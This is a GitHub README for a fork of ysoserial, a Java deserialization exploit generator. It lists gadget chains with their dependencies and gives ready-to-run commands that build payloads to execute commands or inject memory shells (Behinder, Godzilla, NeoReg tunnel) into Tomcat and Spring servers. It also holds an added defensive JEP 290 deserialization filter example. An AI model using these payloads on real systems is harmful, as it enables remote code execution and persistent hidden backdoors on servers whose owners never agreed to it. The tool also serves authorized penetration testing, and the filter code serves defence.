goddemondemongod / ysoserial-y4er


This project forked from hktalent/ysoserial-y4er


A modified version of ysoserial. The main change is to ysoserial.payloads.util.Gadgets.createTemplatesImpl, so that a custom class can be supplied to execute commands, inject a memory shell, or echo deserialization results.

Home Page: https://jitpack.io/com/github/Y4er/ysoserial/main-SNAPSHOT/ysoserial-main-SNAPSHOT.jar

License: MIT License

Shell 0.06% Java 99.83% Dockerfile 0.11%


ysoserial


Usage

$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
  Available payload types:
四月 11, 2022 2:52:36 下午 org.reflections.Reflections scan
信息: Reflections took 77 ms to scan 1 urls, producing 22 keys and 184 values
     Payload                 Authors                                Dependencies
     -------                 -------                                ------------
     AspectJWeaver           @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2
     BeanShell1              @pwntester, @cschneider4711            bsh:2.0b5
     C3P0                    @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Click1                  @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0
     Clojure                 @JackOfMostTrades                      clojure:1.8.0
     CommonsBeanutils1       @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsBeanutils183NOCC @Y4er                                  commons-beanutils:1.8.3
     CommonsBeanutils192NOCC @Y4er                                  commons-beanutils:1.9.2
     CommonsCollections1     @frohoff                               commons-collections:3.1
     CommonsCollections12    @Y4er                                  commons-collections:3.1
     CommonsCollections2     @frohoff                               commons-collections4:4.0
     CommonsCollections3     @frohoff                               commons-collections:3.1
     CommonsCollections4     @frohoff                               commons-collections4:4.0
     CommonsCollections5     @matthias_kaiser, @jasinner            commons-collections:3.1
     CommonsCollections6     @matthias_kaiser                       commons-collections:3.1
     CommonsCollections7     @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     CommonsCollections8     @navalorenzo                           commons-collections4:4.0
     FileUpload1             @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
     Groovy1                 @frohoff                               groovy:2.3.9
     Hibernate1              @mbechler
     Hibernate2              @mbechler
     JBossInterceptors1      @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient              @mbechler
     JRMPListener            @mbechler
     JSON1                   @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1          @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21                 @frohoff
     Jython1                 @pwntester, @cschneider4711            jython-standalone:2.5.2
     MozillaRhino1           @matthias_kaiser                       js:1.7R2
     MozillaRhino2           @_tint0                                js:1.7R2
     Myfaces1                @mbechler
     Myfaces2                @mbechler
     ROME                    @mbechler                              rome:1.0
     Spring1                 @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2                 @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS                  @gebl
     Vaadin1                 @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1                 @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

Memory shells

Taking CommonsBeanutils192NOCC as an example:

java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"                     # TomcatCmdEcho
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromJMX"      # TomcatServletMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromThread"   # TomcatServletMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJMX"       # TomcatFilterMemShellFromJMX     works with Tomcat 7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread"    # TomcatFilterMemShellFromThread  works with Tomcat 7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX"     # TomcatListenerMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread"  # TomcatListenerMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread"    # TomcatListenerNeoRegFromThread     python neoreg.py -k fuckyou
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell"         # SpringInterceptorMemShell       connecting to the shell requires an existing route
java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class"                      # ClassLoaderTemplate
java -jar ysoserial.jar CommonsBeanutils192NOCC "calc"                                    # CommandTemplate                 without a CLASS: or FILE: prefix the argument is treated as a command to execute

One-click injection of a command shell, Behinder (冰蝎) or Godzilla (哥斯拉) memory shell; see the corresponding class for how to connect to the shell. This also fixes the problem where the request and response wrapper classes caused Behinder connections to fail; see the issue.

All of the following gadgets go through Gadgets.createTemplatesImpl and therefore take their argument in the form shown above:

  1. Click1
  2. CommonsBeanutils1
  3. CommonsBeanutils183NOCC
  4. CommonsBeanutils192NOCC
  5. CommonsCollections2
  6. CommonsCollections3
  7. CommonsCollections4
  8. Hibernate1
  9. JavassistWeld1
  10. JBossInterceptors1
  11. Jdk7u21
  12. JSON1
  13. MozillaRhino1
  14. MozillaRhino2
  15. ROME
  16. Spring1
  17. Spring2
  18. Vaadin1
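Mitigation on the receiving side, as an added example that is not part of ysoserial or this fork: a JEP 290 ObjectInputFilter (Java 9+) that rejects the TemplatesImpl sink and the commons-collections/commons-beanutils packages the gadgets above depend on, then allows only the classes the application expects. The allow-list (java.lang.*, java.util.*) and the depth limit are assumptions for this demo, not values from the project.

```java
import java.io.*;
import java.util.ArrayList;
import java.util.List;

// Added example, not code from ysoserial or this fork: a JEP 290 deserialization
// filter that rejects the sink and gadget packages behind the payloads listed above.
public class GadgetFilterDemo {
    // "!" rejects a pattern, ".**" also matches subpackages, and the final "!*"
    // rejects anything not matched earlier, which turns the filter into an allow-list.
    static final String PATTERN = String.join(";",
        "!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", // createTemplatesImpl sink
        "!org.apache.commons.collections.**",  // CommonsCollections1/3/5/6/7, CommonsBeanutils1
        "!org.apache.commons.collections4.**", // CommonsCollections2/4/8
        "!org.apache.commons.beanutils.**",    // CommonsBeanutils183NOCC / 192NOCC
        "maxdepth=8",                          // assumed nesting limit for this application
        "java.lang.*", "java.util.*",          // assumed allow-list of expected classes
        "!*");

    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(PATTERN);

    // Ask the filter directly how it would treat a class, without building a stream.
    static ObjectInputFilter.Status decide(Class<?> clazz) {
        return FILTER.checkInput(new ObjectInputFilter.FilterInfo() {
            public Class<?> serialClass() { return clazz; }
            public long arrayLength() { return -1; }
            public long depth() { return 1; }
            public long references() { return 1; }
            public long streamBytes() { return 0; }
        });
    }

    // Round-trip a benign object through an ObjectInputStream guarded by the filter.
    static Object roundTrip(Serializable value) throws IOException, ClassNotFoundException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) { out.writeObject(value); }
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(buf.toByteArray()))) {
            in.setObjectInputFilter(FILTER); // must be set before the first readObject()
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(roundTrip(new ArrayList<>(List.of("a", "b")))); // on the allow-list
        System.out.println(decide(ArrayList.class));                       // java.util.* pattern
        System.out.println(decide(Class.forName(
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"))); // exact "!" match
        System.out.println(decide(java.net.URL.class)); // caught by "!*" (URLDNS relies on URL)
    }
}
```

When a stream names a class that hits a "!" pattern, readObject() throws InvalidClassException ("filter status: REJECTED") during class resolution, before any instance is created, so the gadget chain never starts.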

Download

  1. Click here to download the prebuilt jar

Building

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

Contributing

  1. Fork it
  2. Create your feature branch (git checkout -b my-new-feature)
  3. Commit your changes (git commit -am 'Add some feature')
  4. Push to the branch (git push origin my-new-feature)
  5. Create new Pull Request

See Also
